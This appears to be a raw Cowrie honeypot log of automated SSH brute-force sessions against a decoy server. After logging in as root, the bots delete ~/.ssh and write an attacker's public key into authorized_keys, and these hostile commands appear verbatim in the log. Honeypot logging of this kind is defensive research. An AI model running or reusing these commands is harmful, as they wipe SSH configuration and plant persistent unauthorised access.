{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:29:56.707123Z","src_ip":"213.6.203.226","session":"5d24f6a05652"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:29:57.021631Z","src_ip":"213.6.203.226","session":"5d24f6a05652"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:29:57.090507Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:29:57.091634Z","src_ip":"213.6.203.226","session":"5d24f6a05652"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":44419,"dst_ip":"1.2.3.4","dst_port":22,"session":"a54a9fdc40b6","protocol":"ssh","message":"New connection: 213.6.203.226:44419 (1.2.3.4:22) [session: a54a9fdc40b6]","sensor":"my-vps","timestamp":"2025-09-09T05:30:59.923118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:30:59.924064Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:30:59.991588Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.login.success","username":"root","password":"6922374","message":"login attempt [root/6922374] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.303095Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:31:00.487124Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.487791Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.488568Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.556859Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:31:00.760635Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.761470Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.831032Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.831895Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":62335,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0a45ccd7219","protocol":"ssh","message":"New connection: 213.6.203.226:62335 (1.2.3.4:22) [session: b0a45ccd7219]","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.897921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.898568Z","src_ip":"213.6.203.226","session":"b0a45ccd7219"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:31:00.966599Z","src_ip":"213.6.203.226","session":"b0a45ccd7219"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:31:01.285389Z","src_ip":"213.6.203.226","session":"b0a45ccd7219"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:02.355500Z","src_ip":"213.6.203.226","session":"b0a45ccd7219"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":44955,"dst_ip":"1.2.3.4","dst_port":22,"session":"434b4e9c0233","protocol":"ssh","message":"New connection: 213.6.203.226:44955 (1.2.3.4:22) [session: 434b4e9c0233]","sensor":"my-vps","timestamp":"2025-09-09T05:31:02.419858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:31:02.420598Z","src_ip":"213.6.203.226","session":"434b4e9c0233"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:31:02.487465Z","src_ip":"213.6.203.226","session":"434b4e9c0233"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:31:02.796708Z","src_ip":"213.6.203.226","session":"434b4e9c0233"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:02.864880Z","src_ip":"213.6.203.226","session":"434b4e9c0233"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:02.865750Z","src_ip":"213.6.203.226","session":"a54a9fdc40b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40605,"dst_ip":"1.2.3.4","dst_port":22,"session":"b503b848555e","protocol":"ssh","message":"New connection: 212.227.235.229:40605 (1.2.3.4:22) [session: b503b848555e]","sensor":"my-vps","timestamp":"2025-09-09T05:31:33.479305Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.79.115.59","src_port":55515,"dst_ip":"1.2.3.4","dst_port":23,"session":"91b5ca1a1265","protocol":"telnet","message":"New connection: 45.79.115.59:55515 (1.2.3.4:23) [session: 91b5ca1a1265]","sensor":"my-vps","timestamp":"2025-09-09T05:31:34.182867Z"}
{"eventid":"cowrie.session.closed","duration":0.4231281280517578,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:34.605928Z","src_ip":"45.79.115.59","session":"91b5ca1a1265"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:35.479848Z","src_ip":"212.227.235.229","session":"b503b848555e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48851,"dst_ip":"1.2.3.4","dst_port":22,"session":"206279859ec7","protocol":"ssh","message":"New connection: 212.227.235.229:48851 (1.2.3.4:22) [session: 206279859ec7]","sensor":"my-vps","timestamp":"2025-09-09T05:31:35.564049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:31:35.565668Z","src_ip":"212.227.235.229","session":"206279859ec7"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-09-09T05:31:35.651145Z","src_ip":"212.227.235.229","session":"206279859ec7"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:31:35.738521Z","src_ip":"212.227.235.229","session":"206279859ec7"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":42809,"dst_ip":"1.2.3.4","dst_port":22,"session":"746d2a5c361e","protocol":"ssh","message":"New connection: 213.6.203.226:42809 (1.2.3.4:22) [session: 746d2a5c361e]","sensor":"my-vps","timestamp":"2025-09-09T05:32:07.599144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:32:07.600071Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:32:07.667410Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.login.success","username":"root","password":"qwert!@#$%","message":"login attempt [root/qwert!@#$%] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:32:07.979056Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:32:08.135944Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.136691Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.137902Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.206359Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:32:08.448382Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.449101Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.518536Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.519412Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":60804,"dst_ip":"1.2.3.4","dst_port":22,"session":"87c244031505","protocol":"ssh","message":"New connection: 213.6.203.226:60804 (1.2.3.4:22) [session: 87c244031505]","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.596779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.597631Z","src_ip":"213.6.203.226","session":"87c244031505"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:32:08.671373Z","src_ip":"213.6.203.226","session":"87c244031505"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:32:09.009298Z","src_ip":"213.6.203.226","session":"87c244031505"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:32:10.085279Z","src_ip":"213.6.203.226","session":"87c244031505"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":55456,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fa121f46ba0","protocol":"ssh","message":"New connection: 213.6.203.226:55456 (1.2.3.4:22) [session: 0fa121f46ba0]","sensor":"my-vps","timestamp":"2025-09-09T05:32:10.158220Z"}
